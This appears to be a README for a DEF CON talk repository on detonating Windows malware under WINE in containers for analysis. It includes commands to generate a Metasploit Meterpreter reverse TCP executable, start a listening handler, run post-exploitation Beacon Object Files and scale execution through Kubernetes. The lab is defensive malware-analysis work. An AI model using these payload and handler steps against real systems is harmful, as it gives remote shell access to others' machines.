This repository is a companion guide to my DEF CON 31 Packet Hacking Village talk "Wine Pairing with Malware".
Throughout this guide you will generate your own Metasploit payloads to execute in WINE. If you're going to execute malware from the wild, ensure you're taking appropriate measures to protect the host machine. WINE provides no sand boxing functionality. Arch Cloud Labs is not responsible for any damage caused by blindly executing malware.
-
Install wine on the Linux host of your choice via the package manager.
-
Pull kali-rolling from Docker hub.
$> podman pull kalilinux/kali-rolling- Start the kali container and get a shell
$> podman run --name kali -ti kalilinux/kali-rolling /bin/bash- Update container and install metasploit-framework and vim
$> apt-get update -y && apt-get install vim metasploit-framework -y
- Now you can exit the container.
$> exit
- Commit container with the image name of kali and a tag of "msf". This will be used in the later examples.
$> podman commit kali kali:msf
- Modify
configs/msf_payload_gen.msfto your desired configuration or use the default values. The default configuration will generate a x64 Meterpreter reverse TCP PE executable to connect on 127.0.0.1 at port 4444.
use payload/windows/x64/meterpreter_reverse_tcp # Set desired payload here
set LHOST 127.0.0.1 # Modify this for your MSF Handler
set LPORT 4444 # Specify port here
generate -f exe -o /tmp/evil.exe
exit- Leverage the provided
generate_payload.shto generate evil.exe, our test Metasploit payload. This script leverages the previously built Kali Metasploit container to generate a Meterpreter exe in the current root directory of this Github project.
Note, all paths are relative to the root directory for this project
$> ./scripts/generate_payload.sh
Upon successful execution, "evil.exe" should exist in the current working directory.
- Start the Metasploit handler via the provided script
./scripts/start_handler.sh.
This bash script spawns the previously created Kali Metasploit container with a resource script to easily create a Metasploit hander. This is done via the --net=host argument to share the underlying host machine's network namespace. By default, the provided x64_reverse_tcp_payload_handler.msf script is set to listen on 127.0.0.1 on port 4444.
$> ./scripts/start_handler.sh
- Execute the evil.exe payload via wine from the host machine.
$> wine evil.exe
- Upon successful execution, you should have obtained a Meterpreter session.
Expanding on the previous two sections, we'll now explore auto executing and obtaining the output of Beacon object Files (BoFs). This repo leverages Trusted Sec's Situational Awareness BoFs.
-
Obtain and compile the Beacon Object Files from Trusted Sec's Repo.
-
Modify
./configs/bof_autorunto specify the BoF to run. For this example, I'm using thearp.x64.oBoF to obtain network information. -
Execute
./scripts/start_bof_handler.shto spawn a Metasploit handler that will load the BoF extension and execute your desired BoF upon successful Meterpreter session connection. The default configuration of this repository assumes BoFs are in the./bofdirectory. The./configs/bof_autorunscript should be updated to reflect the name of the BoF being executed. -
Now that our BoF handler is running, execute
wine evil.exe. This will cause the following to happen:
- The meterpreter payload will to connect to our handler.
- The BoF extension will be loaded into the meterpreter session.
- The autorun script will load and execute the specified bof.
- all output will be logged to msf_bof.log and placed in the root of this directory.
- Your malware.exe should have been killed if successful. Now
cat msf_bof.logto see the results! An example of the output is shown below.
Success.
resource (/tmp/configs/bof_autorun.msf)> execute_bof /tmp/bofs/arp.x64.o
[*] No arguments specified, executing bof with no arguments.
Inteface --- 0x1
Internet Address Physical Address Type
224.0.0.22 static
239.255.255.250 static
Inteface --- 0x2
Internet Address Physical Address Type
172.20.0.1 0C-C4-7A-BD-31-4E dynamic
172.20.1.184 A0-78-17-64-55-5B dynamic
224.0.0.22 static
239.255.255.250 static
Inteface --- 0x3
Internet Address Physical Address Type
224.0.0.22 static
239.255.255.250 staticThe Dockerfile at the root of this repository simply installs wine, copies over a user's specified malware sample (in this case our previously used evil.exe) and executes it for 10 seconds before being terminated via the timeout command. This container can be built via the following command:
$> podman build . -t acl:wine-executionWhen running the metasploit paylaod in a container, also run Wireshark on the host machine to capture the traffic and identify the initial connection to the Metasploit handler.
While this is effective, it doesn't help with scaling the amount of malware you execute.
Podman can generate Kubernetes Pod YAML from previously run containers. This enables you to start exploring the possibility of executing in a Kubernetes cluster!
To generate Kubernetes YAML for a pod deployment, simply execute podman kube generate CONTAINER_NAME.
An example of output has been shown below.
$> podman kube generate
---
apiVersion: v1
kind: Pod
metadata:
annotations:
bind-mount-options: /home/dllcoolj/DEFCON_2023_Wine_Pairing_with_Malware:z
creationTimestamp: "2023-08-08T14:54:13Z"
labels:
app: admiringantonelli-pod
name: admiringantonelli-pod
spec:
containers:
- command:
- msfconsole
- -q
- -r
- /tmp/configs/x64_reverse_tcp_payload_handler_bof.msf
image: localhost/kali:msf
name: admiringantonelli
stdin: true
tty: true
volumeMounts:
- mountPath: /tmp/
name: home-dllcoolj-DEFCON_2023_Wine_Pairing_with_Malware-host-0
hostNetwork: true
hostname: DEFCON
volumes:
- hostPath:
path: /home/dllcoolj/DEFCON_2023_Wine_Pairing_with_Malware
type: Directory
name: home-dllcoolj-DEFCON_2023_Wine_Pairing_with_Malware-host-0Leveraging a "developer" Kubernetes distribution like Minikube, can enable you to start executing WINE on a larger scale. However, you will need to ensure that each pod is executing a different malware sample in order to process your queue.